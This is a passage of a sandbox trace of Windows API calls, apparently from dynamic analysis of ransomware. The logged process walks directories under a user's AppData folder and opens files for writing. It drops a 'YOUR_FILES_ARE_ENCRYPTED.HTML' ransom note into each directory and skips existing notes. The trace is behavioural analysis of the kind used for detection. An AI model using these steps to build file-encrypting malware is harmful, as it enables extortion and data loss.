RandomBuffer=0x19de58) returned 1 [0121.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\windows.contactsupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0121.261] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0121.261] GetProcessHeap () returned 0x600000 [0121.261] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0121.264] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="F4") returned 2 [0121.264] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="CA") returned 2 [0121.264] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="A8") returned 2 [0121.264] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="3A") returned 2 [0121.264] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="7B") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="A5") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="FA") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="8B") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="D5") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="BC") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="AE") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="63") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="A8") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="0A") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="FC") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="00") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="B0") returned 2 [0121.264] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="0C") returned 2 [0121.265] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="EC") returned 2 [0121.265] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="48") returned 2 [0121.265] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="DF") returned 2 [0121.265] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="C5") returned 2 [0121.265] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="51") returned 2 [0121.265] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="04") returned 2 [0121.265] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="31") returned 2 [0121.265] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="3F") returned 2 [0121.265] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="0E") returned 2 [0121.265] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="6A") returned 2 [0121.265] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="24") returned 2 [0121.265] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="96") returned 2 [0121.265] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="1D") returned 2 [0121.265] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="1F") returned 2 [0121.265] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0121.265] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.265] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0121.265] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9e9d39e1, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e9d39e1, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e9d39e1, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x318d3f0, dwReserved1=0x9b3ba, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0121.266] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.266] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 192 [0121.266] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0121.266] lstrlenW (lpString=".LOG1") returned 5 [0121.266] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0121.266] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9e9d39e1, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e9d39e1, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e9d39e1, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d3f0, dwReserved1=0x9b3ba, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0121.266] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.266] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 192 [0121.266] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0121.266] lstrlenW (lpString=".LOG2") returned 5 [0121.266] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0121.266] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9e9d39e1, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e9d39e1, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e9d39e1, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318d3f0, dwReserved1=0x9b3ba, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0121.266] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.266] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 197 [0121.266] GetProcessHeap () returned 0x600000 [0121.266] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\windows.contactsupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0121.267] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.268] CloseHandle (hObject=0x324) returned 1 [0121.268] GetProcessHeap () returned 0x600000 [0121.268] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.268] GetProcessHeap () returned 0x600000 [0121.268] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.268] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e8c896c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e8c896c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e8c896c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f104, dwReserved1=0x62f058, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0121.268] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.268] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 181 [0121.268] GetProcessHeap () returned 0x600000 [0121.268] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\windows.contactsupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0121.274] WriteFile (in: hFile=0x320, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.275] CloseHandle (hObject=0x320) returned 1 [0121.275] GetProcessHeap () returned 0x600000 [0121.275] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.275] GetProcessHeap () returned 0x600000 [0121.275] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.277] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e8c896c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9e8c896c, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9e8c896c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.0_N")) returned 0 [0121.277] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0121.277] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0121.277] GetProcessHeap () returned 0x600000 [0121.277] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.278] WriteFile (in: hFile=0x214, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.279] CloseHandle (hObject=0x214) returned 1 [0121.279] GetProcessHeap () returned 0x600000 [0121.279] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.279] GetProcessHeap () returned 0x600000 [0121.279] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.279] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b79dad4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="windows.devicesflow_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.DEV")) returned 1 [0121.279] StrStrIW (lpFirst="windows.devicesflow_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.279] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy") returned 82 [0121.279] GetProcessHeap () returned 0x600000 [0121.280] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.280] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy" [0121.280] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\*" [0121.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b79dad4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.284] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b79dad4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.284] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0121.284] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.284] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC") returned 85 [0121.284] GetProcessHeap () returned 0x600000 [0121.284] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.285] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC" [0121.285] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\*" [0121.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.287] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 1 [0121.287] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 0 [0121.287] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.287] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0121.287] GetProcessHeap () returned 0x600000 [0121.287] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3151028 [0121.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.292] WriteFile (in: hFile=0x338, lpBuffer=0x3151028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3151028*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.293] CloseHandle (hObject=0x338) returned 1 [0121.293] GetProcessHeap () returned 0x600000 [0121.293] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3151028 | out: hHeap=0x600000) returned 1 [0121.293] GetProcessHeap () returned 0x600000 [0121.293] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.294] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b79dad4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b79dad4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b79dad4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0121.294] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.294] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData") returned 90 [0121.294] GetProcessHeap () returned 0x600000 [0121.294] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.295] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData" [0121.295] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\*" [0121.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b79dad4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b79dad4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b79dad4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.295] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b79dad4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b79dad4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b79dad4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 1 [0121.295] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b79dad4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b79dad4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b79dad4, 